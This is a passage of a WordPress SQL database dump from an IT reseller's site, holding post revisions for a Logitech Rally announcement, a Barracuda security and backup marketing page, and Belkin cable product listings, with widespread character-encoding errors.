five-figure investment,â€ said Scott Wharton, vice president and general manager of the Logitech Video Collaboration.</p>\r\n\r\n<p align=\"justify\">â€œNow, with the Rally portfolio of products, customers get a premium, modular system that raises the bar for USB-connected AV solutions - all at a fraction of the price of other high-end systems.â€</p>\r\n\r\n<p align=\"justify\">Rally separated the speakers from the microphones. By mounting speakers near the display, the audio is better aligned with video, and voices of far-end participants come from the front of the room, which is what people intuitively expect, according to Logitech.</p>\r\n\r\n<p align=\"justify\">\"Logitech has enjoyed great success with its affordable USB conferencecams which work well in traditional meeting rooms and huddle spaces,â€ said Ira M. Weinstein, managing partner, Recon Research.\"</p>\r\n\r\n<p align=\"justify\">\"But until now, Logitech lacked a premium offering for larger spaces. The Rally portfolio gives Logitech the opportunity to move up-market and extend the reach of its conferencecam lineup. Based on what Iâ€™ve seen, Rally has the potential to be as disruptive as the earlier Logitech conferencecam solutionsâ€</p>\r\n\r\n<p align=\"justify\">The standalone Logitech Rally Camera is available for $1999.95. The Logitech Rally system, which includes Rally Camera, plus table and display hubs, one speaker and one mic pod, is available for $3599.95.</p>\r\n\r\n\r\n<!-- /wp:paragraph -->','Logitech announces Logitech Rally','','inherit','closed','closed','','1-revision-v1','','','2019-09-24 10:27:23','2019-09-24 02:27:23','',1,'https://bintara.com.my/blog/2019/09/24/1-revision-v1/',0,'revision','',0),(3254,1,'2019-09-24 10:02:46','2019-09-24 02:02:46','<!-- wp:paragraph -->\r\n<p align=â€justifyâ€>Logitech has announced Logitech Rally, a modular conference cam that features Ultra-HD 4K video, modular audio components, PTZ capabilities and Logitech RightSense technology.</p>\r\n\r\n<p align=â€justifyâ€>â€œJust a few years ago, a high quality video and audio system like Logitech Rally would have easily been a five-figure investment,â€ said Scott Wharton, vice president and general manager of the Logitech Video Collaboration.</p>\r\n\r\n<p align=â€justifyâ€>â€œNow, with the Rally portfolio of products, customers get a premium, modular system that raises the bar for USB-connected AV solutions - all at a fraction of the price of other high-end systems.â€</p>\r\n\r\n<p align=â€justifyâ€>Rally separated the speakers from the microphones. By mounting speakers near the display, the audio is better aligned with video, and voices of far-end participants come from the front of the room, which is what people intuitively expect, according to Logitech.</p>\r\n\r\n<p align=â€justifyâ€>\"Logitech has enjoyed great success with its affordable USB conferencecams which work well in traditional meeting rooms and huddle spaces,â€ said Ira M. Weinstein, managing partner, Recon Research.</p>\r\n\r\n<p align=â€justifyâ€>\"But until now, Logitech lacked a premium offering for larger spaces. The Rally portfolio gives Logitech the opportunity to move up-market and extend the reach of its conferencecam lineup. Based on what Iâ€™ve seen, Rally has the potential to be as disruptive as the earlier Logitech conferencecam solutionsâ€</p>\r\n\r\n<p align=â€justifyâ€>The standalone Logitech Rally Camera is available for $1999.95. The Logitech Rally system, which includes Rally Camera, plus table and display hubs, one speaker and one mic pod, is available for $3599.95.</p>\r\n\r\n<p>Source:Â https://www.pcworld.idg.com.au/article/648153/logitech-announces-logitech-rally/</p>\r\n<!-- /wp:paragraph -->','Logitech announces Logitech Rally','','inherit','closed','closed','','1-revision-v1','','','2019-09-24 10:02:46','2019-09-24 02:02:46','',1,'https://bintara.com.my/blog/2019/09/24/1-revision-v1/',0,'revision','',0),(3255,1,'2019-09-24 10:03:23','2019-09-24 02:03:23','<!-- wp:paragraph -->\r\n<p align=\"justify\">Logitech has announced Logitech Rally, a modular conference cam that features Ultra-HD 4K video, modular audio components, PTZ capabilities and Logitech RightSense technology.</p>\r\n\r\n<p align=â€justifyâ€>â€œJust a few years ago, a high quality video and audio system like Logitech Rally would have easily been a five-figure investment,â€ said Scott Wharton, vice president and general manager of the Logitech Video Collaboration.</p>\r\n\r\n<p align=â€justifyâ€>â€œNow, with the Rally portfolio of products, customers get a premium, modular system that raises the bar for USB-connected AV solutions - all at a fraction of the price of other high-end systems.â€</p>\r\n\r\n<p align=â€justifyâ€>Rally separated the speakers from the microphones. By mounting speakers near the display, the audio is better aligned with video, and voices of far-end participants come from the front of the room, which is what people intuitively expect, according to Logitech.</p>\r\n\r\n<p align=â€justifyâ€>\"Logitech has enjoyed great success with its affordable USB conferencecams which work well in traditional meeting rooms and huddle spaces,â€ said Ira M. Weinstein, managing partner, Recon Research.</p>\r\n\r\n<p align=â€justifyâ€>\"But until now, Logitech lacked a premium offering for larger spaces. The Rally portfolio gives Logitech the opportunity to move up-market and extend the reach of its conferencecam lineup. Based on what Iâ€™ve seen, Rally has the potential to be as disruptive as the earlier Logitech conferencecam solutionsâ€</p>\r\n\r\n<p align=â€justifyâ€>The standalone Logitech Rally Camera is available for $1999.95. The Logitech Rally system, which includes Rally Camera, plus table and display hubs, one speaker and one mic pod, is available for $3599.95.</p>\r\n\r\n<p>Source:Â https://www.pcworld.idg.com.au/article/648153/logitech-announces-logitech-rally/</p>\r\n<!-- /wp:paragraph -->','Logitech announces Logitech Rally','','inherit','closed','closed','','1-revision-v1','','','2019-09-24 10:03:23','2019-09-24 02:03:23','',1,'https://bintara.com.my/blog/2019/09/24/1-revision-v1/',0,'revision','',0),(3256,1,'2019-09-24 10:04:29','2019-09-24 02:04:29','<!-- wp:paragraph -->\r\n<p align=\"justify\">Logitech has announced Logitech Rally, a modular conference cam that features Ultra-HD 4K video, modular audio components, PTZ capabilities and Logitech RightSense technology.</p>\r\n\r\n<p align=\"justify\">â€œJust a few years ago, a high quality video and audio system like Logitech Rally would have easily been a five-figure investment,â€ said Scott Wharton, vice president and general manager of the Logitech Video Collaboration.</p>\r\n\r\n<p align=\"justify\">â€œNow, with the Rally portfolio of products, customers get a premium, modular system that raises the bar for USB-connected AV solutions - all at a fraction of the price of other high-end systems.â€</p>\r\n\r\n<p align=\"justify\">Rally separated the speakers from the microphones. By mounting speakers near the display, the audio is better aligned with video, and voices of far-end participants come from the front of the room, which is what people intuitively expect, according to Logitech.</p>\r\n\r\n<p align=\"justify\">\"Logitech has enjoyed great success with its affordable USB conferencecams which work well in traditional meeting rooms and huddle spaces,â€ said Ira M. Weinstein, managing partner, Recon Research.</p>\r\n\r\n<p align=\"justify\">\"But until now, Logitech lacked a premium offering for larger spaces. The Rally portfolio gives Logitech the opportunity to move up-market and extend the reach of its conferencecam lineup. Based on what Iâ€™ve seen, Rally has the potential to be as disruptive as the earlier Logitech conferencecam solutionsâ€</p>\r\n\r\n<p align=\"justify\">The standalone Logitech Rally Camera is available for $1999.95. The Logitech Rally system, which includes Rally Camera, plus table and display hubs, one speaker and one mic pod, is available for $3599.95.</p>\r\n\r\n<p>Source:Â https://www.pcworld.idg.com.au/article/648153/logitech-announces-logitech-rally/</p>\r\n<!-- /wp:paragraph -->','Logitech announces Logitech Rally','','inherit','closed','closed','','1-revision-v1','','','2019-09-24 10:04:29','2019-09-24 02:04:29','',1,'https://bintara.com.my/blog/2019/09/24/1-revision-v1/',0,'revision','',0),(3257,1,'2019-09-24 10:05:14','2019-09-24 02:05:14','<!-- wp:paragraph -->\r\n<p align=\"justify\">Logitech has announced Logitech Rally, a modular conference cam that features Ultra-HD 4K video, modular audio components, PTZ capabilities and Logitech RightSense technology.</p>\r\n\r\n<p align=\"justify\">â€œJust a few years ago, a high quality video and audio system like Logitech Rally would have easily been a five-figure investment,â€ said Scott Wharton, vice president and general manager of the Logitech Video Collaboration.</p>\r\n\r\n<p align=\"justify\">â€œNow, with the Rally portfolio of products, customers get a premium, modular system that raises the bar for USB-connected AV solutions - all at a fraction of the price of other high-end systems.â€</p>\r\n\r\n<p align=\"justify\">Rally separated the speakers from the microphones. By mounting speakers near the display, the audio is better aligned with video, and voices of far-end participants come from the front of the room, which is what people intuitively expect, according to Logitech.</p>\r\n\r\n<p align=\"justify\">\"Logitech has enjoyed great success with its affordable USB conferencecams which work well in traditional meeting rooms and huddle spaces,â€ said Ira M. Weinstein, managing partner, Recon Research.\"</p>\r\n\r\n<p align=\"justify\">\"But until now, Logitech lacked a premium offering for larger spaces. The Rally portfolio gives Logitech the opportunity to move up-market and extend the reach of its conferencecam lineup. Based on what Iâ€™ve seen, Rally has the potential to be as disruptive as the earlier Logitech conferencecam solutionsâ€</p>\r\n\r\n<p align=\"justify\">The standalone Logitech Rally Camera is available for $1999.95. The Logitech Rally system, which includes Rally Camera, plus table and display hubs, one speaker and one mic pod, is available for $3599.95.</p>\r\n\r\n<p>Source:Â https://www.pcworld.idg.com.au/article/648153/logitech-announces-logitech-rally/</p>\r\n<!-- /wp:paragraph -->','Logitech announces Logitech Rally','','inherit','closed','closed','','1-revision-v1','','','2019-09-24 10:05:14','2019-09-24 02:05:14','',1,'https://bintara.com.my/blog/2019/09/24/1-revision-v1/',0,'revision','',0),(3659,1,'2019-10-25 15:36:53','2019-10-25 07:36:53','','Dell','','inherit','closed','closed','','3655-revision-v1','','','2019-10-25 15:36:53','2019-10-25 07:36:53','',3655,'https://bintara.com.my/blog/2019/10/25/3655-revision-v1/',0,'revision','',0),(3657,1,'2019-10-25 15:35:23','2019-10-25 07:35:23','','Dell Large Format Displays','','trash','closed','closed','','dell-large-format-displays__trashed','','','2019-10-25 15:41:34','2019-10-25 07:41:34','',0,'https://bintara.com.my/?page_id=3657',0,'page','',0),(3658,1,'2019-10-25 15:35:23','2019-10-25 07:35:23','','Dell Large Format Displays','','inherit','closed','closed','','3657-revision-v1','','','2019-10-25 15:35:23','2019-10-25 07:35:23','',3657,'https://bintara.com.my/blog/2019/10/25/3657-revision-v1/',0,'revision','',0),(3262,1,'2019-09-24 12:41:50','2019-09-24 04:41:50','<p><strong>Barracuda\'s</strong> wide range of high-performance network solutions are specifically designed to protect your threat vectors no matter where they reside. Whether it is a website, email, web application, or mobile device, Barracuda has the tools necessary for you to secure and optimize your network perimeter.</p><h2>Email Protection</h2><p>Over 75% of targeted cyber-attacks start with an email. Email-borne attacks interrupt business operations, cause financial damage, and compromise business integrity. Barracuda protects you with multiple layers of protection that includes all aspects of your email infrastructure including gateway defense, email resiliency, fraud protection, and user security awareness.</p>https://youtu.be/HuMxGXS6IxE<h2><strong>Next-Generation Email Security</strong></h2><p>As email-borne attacks have become more prevalent and sophisticated, traditional email security gateways can no longer protect users and data. Many threats, such as spear phishing attacks or emails directed at users via their personal email, bypass gateways.</p><p>While a secure gateway is still necessary, complete email protection also requires a multi-layered defense that stops advanced attacks and protects email data. Barracuda is the only company that combines award-winning email security that can identify phishing emails with user awareness training, archiving, and backup.</p>https://youtu.be/ds9fjUyPyoY<h2>Network and Application Security</h2><p>Barracuda Cloud Generation network and application firewalls are the industry\'s first solutions purpose-built for cloud connected, on-premises, and hybrid networks. Barracuda protect all your users, applications, and data â€“ regardless of what your infrastructure looks like. We ensure secure and reliable connections among multiple sites on premises and the cloud with consumption-based pricing, saving you money on infrastructure costs.</p><h2><strong>Moving from the Data Center to the Public Cloud</strong></h2><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesnâ€™t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.</p><h2>Data Protection</h2><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.</p><h2>Barracuda Backup</h2><p>Cloud-integrated protection for business-critical data wherever it resides</p><h2>Cloud-to-Cloud Backup</h2><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss</p><h2>Donâ€™t Be a Ransomware Victim</h2><h4>Ransomware is on the rise. Barracudaâ€™s multi-layered defense protects your data (and your money).</h4><h2>Understanding Ransomware</h2><p>Ransomware is a type of malware that lets attackers find and encrypt your most important data. They then offer to provide the decryption key only if you pay a ransom, within a short time. This is the number one IT security challenge that you face today, with resource-limited small and mid-size businesses the most likely targets.</p><p>Cybercriminals exploit a variety of threat vectors, including email, network traffic, user behavior, and application traffic to insert ransomware. Without a comprehensive security strategy that secures all these vectors, you are almost certain to become a victim.</p><ul><li>47% of businesses have been affected by ransomware.</li><li>The FBI reports that $209 million was paid to ransomware criminals in the first quarter of 2016.</li><li>59% of ransomware infections are delivered via email attachments and embedded URLs.</li></ul>https://youtu.be/zNkTopX68tk<h5>Barracuda provides a complete family of solutions that work together to help you detect, prevent, and recover from ransomware attacks.</h5>		\n			<h2>Detect</h2>		\n		<p>Detect ransomware and other advanced threats, using automated online threat scanners (offered at no charge) and advanced, multi-layer detection technologies including sandbox analysis.</p>		\n			<h2>Prevent</h2>		\n		<p>Prevent them from infecting your systems, thanks to best-of-breed products to secure your network perimeter, email, web traffic, and outward-facing web applications.</p>		\n			<h2>Recover</h2>		\n		<p>Recover quickly and easily in case attackers are successful, with state-of-the-art backup solutions that leave attackers with nothing, while you get right back to business.</p><h2>Why is Backup Necessary for Office 365?</h2><p>The number one cause of data loss in a SaaS deployment, such as Microsoft Office 365, is accidental data deletion. In fact, about 70 percent of all lost data is due to either accidental or malicious deletion of data by end-users. Other ways that data can be lost include misconfiguration, client sync issues, and most recently the widespread presence of malware and ransomware, which can render data unusable.</p><p>Although Microsoft Office 365 provides some basic recovery options with the recycle bin and email retention, Microsoftâ€™s primary focus within Office 365 is ensuring that service and data availability are not disrupted. It is your responsibility to protect the data that you store in the Office 365 cloud. Barracuda Cloud-to-Cloud Backup provides comprehensive, cost-effective, and scalable protection of your Office 365 data â€“without adding to your infrastructure costs.</p><h2>What We Protect</h2><p>Barracudaâ€™s Cloud-to-Cloud Backup Service backs up all of your Office 365 data to secure Barracuda Cloud Storage with no need for on-premises infrastructure. You can back up data on demand or according to an automated schedule. All Exchange Online, SharePoint Online, and OneDrive for Business data is deduplicated and compressed for maximum storage efficiency and reduced backup windows before being stored in the Barracuda Cloud.</p><p>Exchange Online. Barracuda protects the complete folder structure of each userâ€™s mailbox including all email message and attachments.<br />OneDrive for Business. All files and folders under the Documents Library are protected.<br />SharePoint Online. We protect SharePoint data including Document Libraries, Site Assets, and Picture Libraries within both Team Sites and Public Sites are protected.</p><h2>Fast and Easy Recovery Options</h2><p>All Office 365 data backed up to the Barracuda Cloud is accessible, searchable, and retrievable from anywhere with an Internet connection. Data can be recovered from the site level down to the individual item level. Messages, folders, or even entire mailboxes and be restored back to the original user and location, to a different location within the account, or to a completely different user account. You can also download items for offline use.</p><p>If youâ€™re looking for a specific file or message but are unsure of its location, the search feature can be used to find the item quickly and easily. You can also recover data to a specific point in time by selecting the specific dates from a built-in calendar. Recovered data is compressed to minimize download times.</p><h2>Powerful Reporting and Statistics</h2><p>For IT Administrators, detailed reporting and audit logging are a key component of a backup solution. Barracuda Cloud-to-Cloud Backup provides backup status and health monitoring for each backup source. Automated email alerts are delivered after each backup to specified email recipients containing a summary of the backup and detailed information about which email messages, folders, and files were added, modified, and removed since the last backup.</p><p>On the Status page, graphs show the number of items added and amount of data backed up each day. Storage statistics and graphs detail how much data has been backed up overall and the storage efficiency, as well as how much data is actually being stored in the Barracuda Cloud after deduplication and compression. An Audit Log tracks and provides details about every action performed within the Cloud-to-Cloud Backup interface.</p>','Barracuda','','inherit','closed','closed','','1445-revision-v1','','','2019-09-24 12:41:50','2019-09-24 04:41:50','',1445,'https://bintara.com.my/blog/2019/09/24/1445-revision-v1/',0,'revision','',0),(3265,1,'2019-09-24 12:56:15','2019-09-24 04:56:15','<h2>THE BELKIN DIFFERENCE</h2><h4>Â </h4><h3>Innovation, with quality at its core</h3><p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.</p><h3>Global leader in tech.</h3><p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.</p><h3>Always looking to the future</h3><p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.</p><h3>An unwavering commitment to earning your trust.</h3><p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.</p><h3>Unmatched performance, every time</h3><p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.</p><h3>We believe good design matters.</h3><p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.</p><center>[maxbutton id=\"1\" ]</center><p>Â </p><h4>Product : -</h4><table><tbody><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" /></p><p><strong>Ultra HD High Speed HDMIÂ® Cable</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Mini DisplayPortTM to VGA</strong></p><p>[maxbutton id=\"9\" ]</p></td></tr><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Micro HDMI Adapter</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB A/B Device Cable * A/B DSTP</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>3.5 mm Audio + Charge RockStarâ„¢</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</strong></p><p>[maxbutton id=\"9\" ]</p></td></tr><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Lightning Audio + Charge RockStarâ„¢</strong></p><p>[maxbutton id=\"9\" ]</p></td></tr></tbody></table>','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2019-09-24 12:56:15','2019-09-24 04:56:15','',1446,'https://bintara.com.my/blog/2019/09/24/1446-revision-v1/',0,'revision','',0),(3266,1,'2019-09-24 12:56:58','2019-09-24 04:56:58','<h2>THE BELKIN DIFFERENCE</h2><h4>Â </h4><h3>Innovation, with quality at its core</h3><p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.</p><h3>Global leader in tech.</h3><p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.</p><h3>Always looking to the future</h3><p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.</p><h3>An unwavering commitment to earning your trust.</h3><p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.</p><h3>Unmatched performance, every time</h3><p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.</p><h3>We believe good design matters.</h3><p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.</p><center>[maxbutton id=\"1\" ]</center><p>Â </p><h3>ProductÂ  : -</h3><table><tbody><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" /></p><p><strong>Ultra HD High Speed HDMIÂ® Cable</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Mini DisplayPortTM to VGA</strong></p><p>[maxbutton id=\"9\" ]</p></td></tr><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Micro HDMI Adapter</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB A/B Device Cable * A/B DSTP</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>3.5 mm Audio + Charge RockStarâ„¢</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</strong></p><p>[maxbutton id=\"9\" ]</p></td></tr><tr><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>USB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</strong></p><p>[maxbutton id=\"9\" ]</p></td><td width=\"150\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" /></p><p><strong>Lightning Audio + Charge RockStarâ„¢</strong></p><p>[maxbutton id=\"9\" ]</p></td></tr></tbody></table>','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2019-09-24 12:56:58','2019-09-24 04:56:58','',1446,'https://bintara.com.my/blog/2019/09/24/1446-revision-v1/',0,'revision','',0),(3269,1,'2019-09-24 14:09:35','2019-09-24 06:09:35','<h2>THE BELKIN DIFFERENCE</h2>\n<h4></h4>\n<h3>Innovation, with quality at its core</h3>\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\n<h3>Global leader in tech.</h3>\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\n<h3>Always looking to the future</h3>\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.\n<h3>An unwavering commitment to earning your trust.</h3>\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.\n<h3>Unmatched performance, every time</h3>\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\n<h3>We believe good design matters.</h3>\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\n<center>[maxbutton id=\"1\" ]</center>\n<h3>ProductÂ  : -</h3>\n<table>\n<tbody>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" />\n<strong>Ultra HD High Speed HDMIÂ® Cable</strong>\n<center>[maxbutton id=\"9\" ]</center></td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Mini DisplayPortTM to VGA</strong>\n<center>[maxbutton id=\"9\" ]\n</center></td>\n</tr>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>Micro HDMI Adapter</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB A/B Device Cable * A/B DSTP</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.5 mm Audio + Charge RockStarâ„¢</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n</tr>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\n<strong>USB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</strong>\n<center>[maxbutton id=\"9\" ]</center>\n</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" 